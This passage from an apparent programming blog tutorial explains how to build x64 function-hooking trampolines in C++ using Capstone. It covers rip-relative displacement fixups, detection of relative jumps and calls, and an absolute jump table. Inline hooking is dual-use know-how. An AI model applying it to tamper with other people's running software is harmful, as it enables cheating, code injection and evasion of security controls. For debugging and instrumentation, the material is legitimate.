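    uint32_t absTableOffset;    // start of the absolute instruction table
};

TrampolineLayout ComputeLayout(uint32_t numStolenBytes)
{
    assert(numStolenBytes >= 5); // we always steal at least a 5 byte jump's worth
    TrampolineLayout layout;
    layout.stolenBytesOffset = 0;
    layout.jumpBackOffset = numStolenBytes;
    layout.absTableOffset = layout.jumpBackOffset + kAbsJumpSize;
    return layout;
}
```

<p>With 7 stolen bytes, the jump back starts at offset 7 and the absolute instruction table starts at offset 20. Before any table entries are added, that last offset is also the value BuildTrampoline() returns.</p>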
<p>If we only ever needed to hook “easy” functions (as defined earlier), we could skip down to the last step in our trampoline creation procedure now. There’s a lot more legwork required to support less-than-easy functions though.</p>
<h3 id="step-2-fixing-up-rip-relative-addressing">Step 2: Fixing up RIP-Relative Addressing</h3>
<p>One case where our naive trampoline building function will fail is if any of the stolen instructions contain rip-relative addressing. In x64, there are a <em>lot</em> of instructions that do this, but the easiest example is a function that calls printf.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">PrintHaha</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Haha</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>On my machine, the generated assembly uses an lea instruction to load the string location before the call to printf. The assembly string generated by Visual Studio makes it look like the lea instruction is grabbing an absolute address, but the instruction bytes reveal that we’re actually computing the address of the “Haha\n” string by adding an offset to the current value of the instruction pointer.</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">PrintHaha:
00007FFCB54211E0 48 8D 0D F9 1F 00 00 lea rcx,[string "Haha\n" (07FFCB54231E0h)]
00007FFCB54211E7 E9 24 FE FF FF jmp printf (07FFCB5421010h) </code></pre></figure>
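<p>To see where that offset is hiding, here’s a small sketch that decodes the lea by hand. RipRelativeTarget is a hypothetical helper written for this example, and it assumes a 4 byte displacement, which is what this lea uses. The last four bytes of the instruction (F9 1F 00 00) are the little endian value 0x1FF9, and the instruction pointer is already pointing at the next instruction when the lea executes.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Computes the address a rip-relative operand refers to.
// instrAddr:  address the instruction lives at
// bytes/size: the raw instruction bytes
// dispOffset: index of the 4 byte displacement inside the instruction
//             (3 for the lea in the listing above)
uint64_t RipRelativeTarget(uint64_t instrAddr, const uint8_t* bytes, size_t size, size_t dispOffset)
{
    assert(dispOffset + sizeof(int32_t) <= size);
    int32_t disp;
    std::memcpy(&disp, bytes + dispOffset, sizeof(disp)); // assumes a little endian host, like x64
    // rip points at the *next* instruction while this one executes
    return instrAddr + size + (int64_t)disp;
}
```

<p>Feeding it the seven lea bytes and the address 0x00007FFCB54211E0 gives 0x00007FFCB54211E7 + 0x1FF9, which is the 0x00007FFCB54231E0 that Visual Studio printed as if it were an absolute address.</p>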
<p>If we steal the lea instruction verbatim, we’ll get garbage data when we execute the stolen instruction because our instruction pointer will be at a different address. In order to actually use instructions that have rip-relative addressing in our trampoline, we need to fix up the offsets they use to be relative to our trampoline memory.</p>
<p>The first step of this is to detect when an instruction contains a rip-relative operand. Capstone makes this easy.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">inst</span><span class="p">.</span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">.</span><span class="n">op_count</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86_op</span><span class="o">*</span> <span class="n">op</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">operands</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
<span class="c1">//mem type is rip relative, like lea rcx,[rip+0xbeef]</span>
<span class="k">if</span> <span class="p">(</span><span class="n">op</span><span class="o">-></span><span class="n">type</span> <span class="o">==</span> <span class="n">X86_OP_MEM</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//if we're relative to rip</span>
<span class="k">return</span> <span class="n">op</span><span class="o">-></span><span class="n">mem</span><span class="p">.</span><span class="n">base</span> <span class="o">==</span> <span class="n">X86_REG_RIP</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Relocating an instruction that’s been identified as having a rip-relative operand is a bit more of a bear. Remember how I mentioned that we’re going to put our trampoline in memory that’s within a 32 bit jump of our target function? That’s to try to avoid cases where the new offset we compute is too large to be stored in the existing instruction’s operand.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">template</span><span class="o"><</span><span class="k">class</span> <span class="nc">T</span><span class="p">></span>
<span class="n">T</span> <span class="nf">GetDisplacement</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">uint8_t</span> <span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">T</span> <span class="n">disp</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">T</span><span class="p">));</span>
<span class="k">return</span> <span class="n">disp</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//rewrite instruction bytes so that any RIP-relative displacement operands</span>
<span class="c1">//make sense with wherever we're relocating to</span>
<span class="kt">void</span> <span class="nf">RelocateInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">inst</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstLocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_x86</span><span class="o">*</span> <span class="n">x86</span> <span class="o">=</span> <span class="o">&</span><span class="p">(</span><span class="n">inst</span><span class="o">-></span><span class="n">detail</span><span class="o">-></span><span class="n">x86</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">displacement</span> <span class="o">=</span> <span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_offset</span><span class="p">];</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">x86</span><span class="o">-></span><span class="n">encoding</span><span class="p">.</span><span class="n">disp_size</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int8_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint8_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">1</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int16_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">uint16_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int32_t</span> <span class="n">disp</span> <span class="o">=</span> <span class="n">GetDisplacement</span><span class="o"><</span><span class="kt">int32_t</span><span class="o">></span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">offset</span><span class="p">);</span>
<span class="n">disp</span> <span class="o">-=</span> <span class="kt">uint64_t</span><span class="p">(</span><span class="n">dstLocation</span><span class="p">)</span> <span class="o">-</span> <span class="n">inst</span><span class="o">-></span><span class="n">address</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">offset</span><span class="p">],</span> <span class="o">&</span><span class="n">disp</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="p">}</span><span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Shout out to the <a href="https://github.com/stevemk14ebr/PolyHook/blob/577637181705ac52d2ae05a6db57ea709759ae56/PolyHook/PolyHook.hpp#L878">polyhook source</a> that I stole this logic from.</p>
<p>Plugging these functions into the BuildTrampoline() logic requires adding a check and a function call to the for loop that processes our stolen instructions.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="c1">//perform any fixup logic to the stolen instructions here</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Now we can hook our little printf function with wild abandon!</p>
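<p>If you want to convince yourself that the displacement math is right, it helps to run the numbers for the lea in PrintHaha. The sketch below isolates the 4 byte case of RelocateInstruction() and adds a range check that the code above doesn’t have. RelocateDisp32 is a hypothetical name, and the trampoline address used in the example afterwards is made up.</p>

```cpp
#include <cassert>
#include <cstdint>

// Computes the displacement a rip-relative instruction needs after being moved
// from oldAddr to newAddr so that it still refers to the same target.
// Returns false if the result no longer fits in a signed 32 bit field.
bool RelocateDisp32(uint64_t oldAddr, uint64_t newAddr, int32_t oldDisp, int32_t* newDisp)
{
    assert(newDisp != nullptr);
    // moving the instruction forward by N bytes means the offset must shrink by N
    int64_t moved = (int64_t)(newAddr - oldAddr);
    int64_t adjusted = (int64_t)oldDisp - moved;
    if (adjusted < INT32_MIN || adjusted > INT32_MAX) return false;
    *newDisp = (int32_t)adjusted;
    return true;
}
```

<p>Moving the lea from 0x00007FFCB54211E0 to a pretend trampoline at 0x00007FFCB5400000 shifts it back by 0x211E0 bytes, so the displacement grows from 0x1FF9 to 0x231D9. The new instruction ends at 0x00007FFCB5400007, and adding 0x231D9 to that lands on 0x00007FFCB54231E0 again. If the trampoline were more than 2GB away, the function would return false instead, which is the case that allocating “near” memory is meant to avoid.</p>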
<h3 id="step-3-building-the-absolute-instruction-table">Step 3: Building the Absolute Instruction Table</h3>
<p>Next we need to deal with any relative jump or call instructions in our stolen bytes. After all, “jump 10 bytes from here” doesn’t mean very much when the instruction has been moved to a new “here.” I have no idea how to handle loop instructions, so the example code will only deal with jmp and call instructions.</p>
<p>Like with the rip-relative operands, the first thing we need to do is identify whether an instruction is one of the flavors of jmp or call that we care about. Identifying relative calls is pretty easy, because there aren’t that many varieties of call instructions, and all the relative versions have opcodes that start with 0xE8.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Identifying jmps is a little harder because there are lots of different types of jmp instructions. Since conditional jumps <em>only</em> come in relative versions, if an instruction’s id says it’s a conditional jump, we know it uses relative addressing. The unconditional “jmp” instruction <em>can</em> use relative addressing, but it can also do things like jump to an address in a register. Thankfully, the behaviour of a jmp is dictated by its opcode bytes. Relative jmps start with 0xEB or 0xE9.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>We can use these two functions to quickly identify any stolen instructions that are going to require extra attention:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="p">}</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></figure>
<p>Next, we need to figure out the address that the original instruction wanted to go to, and add an absolute jump (or call) to that address to our Absolute Instruction Table. The Capstone library handles calculating the target address of relative instructions for us automatically, which is handy.</p>
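<p>For the curious, the calculation for unconditional relative jmps isn’t complicated. This is a hand-rolled sketch of the math, not Capstone’s actual code, and RelativeJmpTarget is a hypothetical helper that only understands the 0xEB and 0xE9 encodings mentioned above.</p>

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Computes where an unconditional relative jmp (0xEB rel8 or 0xE9 rel32) lands.
uint64_t RelativeJmpTarget(uint64_t instrAddr, const uint8_t* bytes, size_t size)
{
    assert(size >= 2);
    int64_t rel = 0;
    if (bytes[0] == 0xEB) // short jump, 1 byte signed offset
    {
        int8_t rel8;
        std::memcpy(&rel8, bytes + 1, sizeof(rel8));
        rel = rel8;
    }
    else // 0xE9 near jump, 4 byte signed offset
    {
        assert(bytes[0] == 0xE9 && size >= 5);
        int32_t rel32;
        std::memcpy(&rel32, bytes + 1, sizeof(rel32)); // assumes a little endian host, like x64
        rel = rel32;
    }
    // offsets are measured from the end of the jump instruction
    return instrAddr + size + rel;
}
```

<p>The jmp at the end of the PrintHaha listing is a good test case. Its bytes are E9 24 FE FF FF, so the offset is -0x1DC. The instruction ends at 0x00007FFCB54211EC, and subtracting 0x1DC gives 0x00007FFCB5421010, which matches the address of printf shown in the disassembly.</p>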
<p>Jumps are easier to handle than calls, so we’ll start there. We’ll reuse the WriteAbsoluteJump64 function from earlier in this post to make the code a bit more concise.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">absTableMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">targetAddr</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//size of mov/jmp instrs for absolute jump</span>
<span class="p">}</span></code></pre></figure>
<p>Note that this function doesn’t rewrite the existing jump instruction, it only adds an absolute version of it to the absolute instruction table (AIT). We’ll handle pointing the original jump to this AIT entry later in this post.</p>
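<p>If it’s been a while since the earlier section, here’s a rough sketch of the 13 bytes that end up in the AIT for a jump. This is not the real WriteAbsoluteJump64(): EncodeAbsoluteJump64() and ParseBranchTarget() are hypothetical names, and the sketch writes into a plain buffer so the bytes can be inspected on any platform. It also assumes Capstone hands us the target as a string like 0x7ff6a1b2c3d4, which is why the parse uses base 0.</p>

```cpp
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

// Size of "mov r10, imm64" (10 bytes) followed by "jmp r10" (3 bytes).
constexpr uint32_t kAbsJumpSize = 13;

// Hypothetical stand-in for WriteAbsoluteJump64: encodes the jump into dst
// without needing executable memory, so the result can be inspected.
uint32_t EncodeAbsoluteJump64(uint8_t* dst, uint64_t targetAddr)
{
    assert(dst != nullptr);
    const uint8_t jmpAsmBytes[kAbsJumpSize] = {
        0x49, 0xBA, 0, 0, 0, 0, 0, 0, 0, 0, // mov r10, imm64 (immediate patched below)
        0x41, 0xFF, 0xE2                    // jmp r10
    };
    memcpy(dst, jmpAsmBytes, sizeof(jmpAsmBytes));
    memcpy(dst + 2, &targetAddr, sizeof(targetAddr)); // overwrite the placeholder immediate
    return kAbsJumpSize;
}

// Assumption: the operand string is the resolved target in "0x..." form.
// Base 0 lets strtoull pick hex from the prefix.
uint64_t ParseBranchTarget(const char* opStr)
{
    return strtoull(opStr, nullptr, 0);
}
```

<p>Calling EncodeAbsoluteJump64(buf, ParseBranchTarget("0x7ff6a1b2c3d4")) fills buf with 49 BA, the eight address bytes in little-endian order, and then 41 FF E2.</p>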
<p>Dealing with calls is a bit different. If we just add an absolute call instruction to our AIT, when that call returns, we’ll wind up at the next jump in the table. That would be bad, so instead we also need to add a jump instruction after our absolute calls to redirect program flow to somewhere more helpful. In this case, we’ll jump to the middle of our trampoline, which is the jump back to the hooked function’s body.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">AddCallToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">call</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackToHookedFunc</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">call</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
<span class="kt">uint64_t</span> <span class="n">targetAddr</span> <span class="o">=</span> <span class="n">_strtoui64</span><span class="p">(</span><span class="n">targetAddrStr</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">dstMem</span> <span class="o">=</span> <span class="n">absTableMem</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">callAsmBytes</span><span class="p">[]</span> <span class="o">=</span>
<span class="p">{</span>
<span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="mh">0xAA</span><span class="p">,</span> <span class="c1">//movabs 64 bit value into r10</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xD2</span><span class="p">,</span> <span class="c1">//call r10</span>
<span class="p">};</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">callAsmBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">targetAddr</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="o">&</span><span class="n">callAsmBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">));</span>
<span class="n">dstMem</span> <span class="o">+=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">);</span>
<span class="c1">//after the call, we need to add a second 2 byte jump, which will jump back to the </span>
<span class="c1">//final jump of the stolen bytes</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">jumpBackToHookedFunc</span> <span class="o">-</span> <span class="p">(</span><span class="n">dstMem</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">)))</span> <span class="p">};</span> <span class="c1">//rel8 is relative to the end of this jmp, which is written at dstMem</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">dstMem</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">callAsmBytes</span><span class="p">)</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">);</span> <span class="c1">//15</span>
<span class="p">}</span></code></pre></figure>
<p>You’ve probably noticed that both of these functions return the number of bytes that they wrote to the AIT. This is so we can increment the absTableMem pointer in BuildTrampoline(). These calls should be added inside the IsRelativeJump()/IsRelativeCall() conditionals in the BuildTrampoline() function.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRIPRelativeInstr</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">RelocateInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="c1">//rewrite inst here</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeCall</span><span class="p">(</span><span class="n">inst</span><span class="p">))</span>
<span class="p">{</span>
